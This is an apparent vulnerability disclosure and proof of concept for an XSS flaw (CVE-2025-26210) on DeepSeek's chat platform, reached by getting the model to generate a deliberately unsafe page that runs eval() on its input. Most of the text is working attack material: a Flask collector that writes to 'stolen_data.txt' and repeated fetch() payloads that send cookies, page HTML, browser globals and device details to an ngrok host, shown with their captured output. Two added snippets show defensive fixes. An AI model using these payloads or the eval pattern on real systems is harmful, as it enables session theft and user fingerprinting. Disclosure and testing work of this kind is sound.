# DeepSeek XSS
**CVE-2025-26210**
> Attackers can leverage AI-generated insecure code to execute arbitrary JavaScript
>
> Injecting malicious payloads directly into input fields provided by the generated web application
>
> Exploiting insecure usage within AI-generated JavaScript

**Affected Versions**
Versions from R1 to the latest V3.1 are all affected. This test was conducted after R1, so versions before R1 cannot be guaranteed to be unaffected.
This XSS vulnerability affects DeepSeek AI platform versions released on February 1, 2025.
- DeepSeek-R1 model integration in chat.deepseek.com
- https://api-docs.deepseek.com/news/news250120
----
# POC
I first asked DeepSeek to write a webpage containing a vulnerability and run it on the platform, because the platform itself can trigger XSS by uploading files or asking it to write a program.
Then it wrote me an unsafe website like this:
```html
<!DOCTYPE html>
<html>
<head>
<title>Unsafe Code Execution</title>
<style>
body { font-family: Arial, sans-serif; padding: 20px; }
.container { max-width: 800px; margin: 0 auto; }
form { background: #f4f4f4; padding: 20px; border-radius: 8px; }
input[type="text"] { width: 300px; padding: 8px; }
button { padding: 8px 16px; background: #007bff; color: white; border: none; border-radius: 4px; }
pre { background: #333; color: white; padding: 15px; border-radius: 5px; }
</style>
</head>
<body>
<div class="container">
<h1>Unsafe Code Execution</h1>
<form id="codeForm">
<label for="arg">Enter Argument (arg):</label>
<input type="text" id="arg" name="arg" placeholder="e.g., 1; alert('Hacked!')" required>
<button type="submit">Execute</button>
</form>
<h2>Result:</h2>
<pre id="output"></pre>
</div>
<script>
document.getElementById('codeForm').addEventListener('submit', (e) => {
e.preventDefault();
const arg = document.getElementById('arg').value;
const myvar = "varname";
try {
eval(`${myvar} = ${arg};`);
document.getElementById('output').textContent = `Executed: ${myvar} = ${arg}`;
} catch (error) {
document.getElementById('output').textContent = `Error: ${error.message}`;
}
});
</script>
</body>
</html>
```
I can attack directly like this
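
For contrast with the `eval` sink in the generated page, the same handler logic can treat the argument as data instead of code. This is an added example, not part of the original write-up or of DeepSeek's output; `parseArg` and `handleSubmit` are hypothetical names.

```javascript
// Added example: the submit handler's logic with the eval() sink replaced
// by a strict data parser. parseArg and handleSubmit are hypothetical names.

// Accept only a JSON literal (number, string, boolean, null, array, object).
// Input that is code rather than data makes JSON.parse throw.
function parseArg(arg) {
  try {
    return { ok: true, value: JSON.parse(arg) };
  } catch {
    return { ok: false, error: 'Argument must be a JSON literal' };
  }
}

// Mirrors the page's handler and returns the text that would be written
// to #output via textContent (never innerHTML).
function handleSubmit(arg) {
  const store = Object.create(null); // values live here, not on window
  const parsed = parseArg(arg);
  if (!parsed.ok) return `Error: ${parsed.error}`;
  store.varname = parsed.value;
  return `Stored: varname = ${JSON.stringify(store.varname)}`;
}

// Constructed inputs: a benign value and the placeholder text from the form.
const samples = ['42', "1; alert('Hacked!')"];
for (const s of samples) console.log(handleSubmit(s));
```

Because nothing is evaluated, no `varname` global is created on `window` and the second input is rejected as a parse error.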

After multiple tests, we decided to try a deeper attack.

```python
from flask import Flask, request

app = Flask(__name__)


@app.route('/', methods=['POST'])
def handle_post():
    # Append each received POST body to a local file
    data = request.data.decode('utf-8')
    with open('stolen_data.txt', 'a') as f:
        f.write(data + '\n')
    return 'Data received and saved', 200


if __name__ == '__main__':
    app.run(port=5000)
# python3 payload.py
```
I can test whether I can get the cookie this way.
```javascript
fetch('https://XXX.ngrok-free.app', {method: 'POST', body: document.cookie});
```
Yes, it sent it back to my machine.

When I enter the following in the input box:
```javascript
fetch('https://XXX.ngrok-free.app', {method: 'POST', body: location.href});
fetch('https://XXX.ngrok-free.app', { method: 'POST', body: JSON.stringify(window.location.href) });
```
```
"https://cdn.deepseek.com/usercontent/usercontent.html"
```
I saw that a piece of data was sent back to my server.

When we try to access these locations, we get a 403 error.
This is normal, but it also leaks the nginx version.

The following are attempts to leak the current user's system information using various attack methods:
```javascript
fetch('https://XXX.ngrok-free.app', {method: 'POST', body: navigator.userAgent});

fetch('https://XXX.ngrok-free.app', {method: 'POST', body: JSON.stringify({ua: navigator.userAgent, os: navigator.platform, lang: navigator.language})});
```
```json
{"ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36","os":"Win32","lang":"en-US"}
```
Directly read what page the current user is on:
```javascript
fetch('https://XXX.ngrok-free.app', {method: 'POST', body: document.documentElement.outerHTML});

fetch('https://XXX.ngrok-free.app', {method: 'POST', body: JSON.stringify({globals: Object.keys(window)})});
```
```json
{"globals":["window","self","document","name","location","customElements","history","navigation","locationbar","menubar","personalbar","scrollbars","statusbar","toolbar","status","closed","frames","length","top","opener","parent","frameElement","navigator","origin","external","screen","innerWidth","innerHeight","scrollX","pageXOffset","scrollY","pageYOffset","visualViewport","screenX","screenY","outerWidth","outerHeight","devicePixelRatio","event","clientInformation","screenLeft","screenTop","styleMedia","onsearch","isSecureContext","trustedTypes","performance","onappinstalled","onbeforeinstallprompt","crypto","indexedDB","sessionStorage","localStorage","onbeforexrselect","onabort","onbeforeinput","onbeforematch","onbeforetoggle","onblur","oncancel","oncanplay","oncanplaythrough","onchange","onclick","onclose","oncontentvisibilityautostatechange","oncontextlost","oncontextmenu","oncontextrestored","oncuechange","ondblclick","ondrag","ondragend","ondragenter","ondragleave","ondragover","ondragstart","ondrop","ondurationchange","onemptied","onended","onerror","onfocus","onformdata","oninput","oninvalid","onkeydown","onkeypress","onkeyup","onload","onloadeddata","onloadedmetadata","onloadstart","onmousedown","onmouseenter","onmouseleave","onmousemove","onmouseout","onmouseover","onmouseup","onmousewheel","onpause","onplay","onplaying","onprogress","onratechange","onreset","onresize","onscroll","onsecuritypolicyviolation","onseeked","onseeking","onselect","onslotchange","onstalled","onsubmit","onsuspend","ontimeupdate","ontoggle","onvolumechange","onwaiting","onwebkitanimationend","onwebkitanimationiteration","onwebkitanimationstart","onwebkittransitionend","onwheel","onauxclick","ongotpointercapture","onlostpointercapture","onpointerdown","onpointermove","onpointerrawupdate","onpointerup","onpointercancel","onpointerover","onpointerout","onpointerenter","onpointerleave","onselectstart","onselectionchange","onanimationend","onanimationiteration","onanimationstart","ontransitionrun","ontransitionstart","ontransitionend","ontransitioncancel","onafterprint","onbeforeprint","onbeforeunload","onhashchange","onlanguagechange","onmessage","onmessageerror","onoffline","ononline","onpagehide","onpageshow","onpopstate","onrejectionhandled","onstorage","onunhandledrejection","onunload","crossOriginIsolated","scheduler","alert","atob","blur","btoa","cancelAnimationFrame","cancelIdleCallback","captureEvents","clearInterval","clearTimeout","close","confirm","createImageBitmap","fetch","find","focus","getComputedStyle","getSelection","matchMedia","moveBy","moveTo","open","postMessage","print","prompt","queueMicrotask","releaseEvents","reportError","requestAnimationFrame","requestIdleCallback","resizeBy","resizeTo","scroll","scrollBy","scrollTo","setInterval","setTimeout","stop","structuredClone","webkitCancelAnimationFrame","webkitRequestAnimationFrame","chrome","caches","cookieStore","ondevicemotion","ondeviceorientation","ondeviceorientationabsolute","launchQueue","sharedStorage","documentPictureInPicture","getScreenDetails","queryLocalFonts","showDirectoryPicker","showOpenFilePicker","showSaveFilePicker","originAgentCluster","onpageswap","onpagereveal","credentialless","fence","speechSynthesis","onscrollend","onscrollsnapchange","onscrollsnapchanging","webkitRequestFileSystem","webkitResolveLocalFileSystemURL","trustedOrigin","varname"]}
```
```javascript
fetch('https://XXX.ngrok-free.app', {method: 'POST', body: JSON.stringify({screenInfo: {width: window.innerWidth, height: window.innerHeight, x: window.screenX, y: window.screenY}})});
```
```json
{"screenInfo":{"width":758,"height":699,"x":0,"y":0}}
```
```javascript
fetch('https://XXX.ngrok-free.app', {method: 'POST', body: JSON.stringify({cpu: navigator.hardwareConcurrency, ram: navigator.deviceMemory})});
```
```json
{"cpu":16,"ram":8}
```
```javascript
fetch('https://XXX.ngrok-free.app', {
  method: 'POST',
  body: JSON.stringify({
    hardwareConcurrency: navigator.hardwareConcurrency,
    deviceMemory: navigator.deviceMemory
  })
});
```
```json
{"hardwareConcurrency":16,"deviceMemory":8}
```
```javascript
fetch('https://XXX.ngrok-free.app', {
  method: 'POST',
  body: JSON.stringify(performance.timing)
});
```
```json
{"connectStart":1738654496434,"secureConnectionStart":1738654496476,"unloadEventEnd":0,"domainLookupStart":1738654496377,"domainLookupEnd":1738654496434,"responseStart":1738654496551,"connectEnd":1738654496512,"responseEnd":1738654496552,"requestStart":1738654496512,"domLoading":1738654496556,"redirectStart":0,"loadEventEnd":1738654496562,"domComplete":1738654496562,"navigationStart":1738654496372,"loadEventStart":1738654496562,"domContentLoadedEventEnd":1738654496562,"unloadEventStart":0,"redirectEnd":0,"domInteractive":1738654496562,"fetchStart":1738654496374,"domContentLoadedEventStart":1738654496562}
```
```javascript
navigator.getBattery().then(battery => {
  fetch('https://XXX.ngrok-free.app', {
    method: 'POST',
    body: JSON.stringify({
      batteryLevel: battery.level,
      isCharging: battery.charging
    })
  });
});
```
```
{"batteryLevel":1,"isCharging":true}
```
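
Every step above depends on two browser behaviours on the user-content page: `eval()` being permitted and `fetch()` being allowed to reach an external host. The following added example (not DeepSeek's configuration and not code from the original write-up) checks a Content-Security-Policy string for both. The helper names and the two sample policies are constructed, and the source matching is simplified.

```javascript
// Added example: simplified CSP evaluation for the two behaviours the PoC uses.
// parseCsp, allowsEval, allowsConnect and audit are hypothetical helpers.

// Split a policy into directive -> source list (first occurrence wins, as in CSP).
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    const key = name.toLowerCase();
    if (key && !directives.has(key)) directives.set(key, sources);
  }
  return directives;
}

// eval() is refused when a script-src (or fallback default-src) exists
// and does not list 'unsafe-eval'.
function allowsEval(directives) {
  const src = directives.get('script-src') ?? directives.get('default-src');
  return src === undefined || src.includes("'unsafe-eval'");
}

// fetch() is governed by connect-src, falling back to default-src.
// Simplified matching: *, 'self', scheme sources, hosts and *.wildcards.
function allowsConnect(directives, target, selfOrigin) {
  const src = directives.get('connect-src') ?? directives.get('default-src');
  if (src === undefined) return true;
  const url = new URL(target);
  return src.some((s) => {
    if (s === '*') return ['http:', 'https:', 'ws:', 'wss:'].includes(url.protocol);
    if (s === "'self'") return url.origin === selfOrigin;
    if (s.startsWith("'")) return false; // 'none' and other keywords match no URL
    if (/^[a-z][a-z0-9+.-]*:$/i.test(s)) return s.toLowerCase() === url.protocol;
    const m = s.toLowerCase().match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^:/]+)/);
    if (!m || (m[1] && `${m[1]}:` !== url.protocol)) return false;
    return m[2].startsWith('*.') ? url.hostname.endsWith(m[2].slice(1)) : url.hostname === m[2];
  });
}

function audit(policy, target, selfOrigin) {
  const d = parseCsp(policy);
  return { evalAllowed: allowsEval(d), fetchAllowed: allowsConnect(d, target, selfOrigin) };
}

// Constructed policies; the origin and target are the ones shown on the page.
const ORIGIN = 'https://cdn.deepseek.com';
const TARGET = 'https://XXX.ngrok-free.app';
const WEAK = "default-src * 'unsafe-inline' 'unsafe-eval'";
const TIGHT = "default-src 'none'; script-src 'unsafe-inline'; connect-src 'none'";
console.log(audit(WEAK, TARGET, ORIGIN), audit(TIGHT, TARGET, ORIGIN));
```

The tighter policy still lets generated inline scripts run, but it refuses `eval()` and every outbound `fetch()`.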
## Demo
https://youtu.be/IgQwy52FVT4
## Update 2025/09 DeepSeek-V3.1
Even today, the latest version of DeepSeek is still vulnerable to XSS.

## Related vulnerability discussion
https://github.com/deepseek-ai/DeepSeek-V3/issues?q=XSS